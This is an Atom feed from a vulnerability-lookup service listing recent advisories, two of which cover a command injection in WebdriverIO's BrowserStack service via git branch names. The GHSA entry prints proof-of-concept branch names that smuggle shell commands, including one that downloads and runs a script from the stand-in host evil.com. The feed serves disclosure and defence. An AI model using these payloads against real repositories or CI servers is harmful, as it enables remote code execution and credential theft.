<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-03T15:12:47.706860+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/bdu:2026-07092</id>
    <title>bdu:2026-07092</title>
    <updated>2026-10-03T15:12:47.766783+00:00</updated>
    <content>bdu:2026-07092</content>
    <link href="https://cve.radiocsirt.org/vuln/bdu:2026-07092"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-339781</id>
    <title>EUVD-2026-339781</title>
    <updated>2026-10-03T15:12:47.766820+00:00</updated>
    <content>EUVD-2026-339781</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-339781"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2026-25244</id>
    <title>fkie_cve-2026-25244</title>
    <updated>2026-10-03T15:12:47.766834+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>WebdriverIO is a test automation framework for unit, e2e and component testing using WebDriver, WebDriver BiDi and Appium. Versions below 9.24.0 contain a command injection vulnerability leading to remote code execution (RCE) in test orchestration. Git permits branch names containing shell metacharacters, and getGitMetadataForAISelection() interpolates these names directly into execSync() calls without sanitization. An attacker can exploit this by supplying a malicious repository (via testOrchestrationOptions.runSmartSelection.source, or the current directory if unset) whose branch name carries a payload, causing the shell to execute arbitrary code. This enables remote code execution on CI/CD servers and developer machines, leading to credential and secret disclosure, source code and SSH key exfiltration, system compromise, and supply chain attacks via tampered build artifacts. The issue has been fixed in version 9.24.0.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2026-25244"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-5c46-x3qw-q7j7</id>
    <title>GHSA-5c46-x3qw-q7j7 — WebdriverIO BrowserStack Service has a Command Injection issue</title>
    <updated>2026-10-03T15:12:47.766868+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> npm: @wdio/browserstack-service</p>
<p>### Summary
A command injection vulnerability exists in `@wdio/browserstack-service` that allows remote code execution (RCE) when processing git branch names in test orchestration. An attacker can exploit this by providing a malicious git repository with a branch name containing shell command injection payloads.</p>
<p>### Details
_Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer._</p>
<p>### Vulnerable Code
**File**:  https://github.com/webdriverio/webdriverio/blob/ea0e3e00288abced4c739ff9e46c46977b7cdbd2/packages/wdio-browserstack-service/src/testorchestration/helpers.ts#L204</p>
<p>### Root Cause
User-controlled git branch names are directly interpolated into `execSync()` calls without sanitization. Git allows branch names to contain special characters ,that can be used for command injection.
Git allows to create these branches.
```
git checkout -b "main;touch\${IFS}/tmp/pwned.txt;echo\${IFS}PWNED"
git checkout -b "main;rm\${IFS}/tmp/pwned.txt;echo\${IFS}PWNED"
git checkout -b "main;curl\${IFS}evil.com/evil.sh\${IFS}&gt;/tmp/evil.sh;bash\${IFS}/tmp/evil.sh;echo\${IFS}PWNED"
```</p>
<p>### Attack Vector
1. Attacker creates a malicious git repository with a branch name containing command injection payload
2. Attacker configures WebdriverIO to use this repository via `testOrchestrationOptions.runSmartSelection.source`. if `source` is not provided it takes current directory as `source`.
3. When `getGitMetadataForAISelection()` executes,…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-5c46-x3qw-q7j7"/>
  </entry>
</feed>
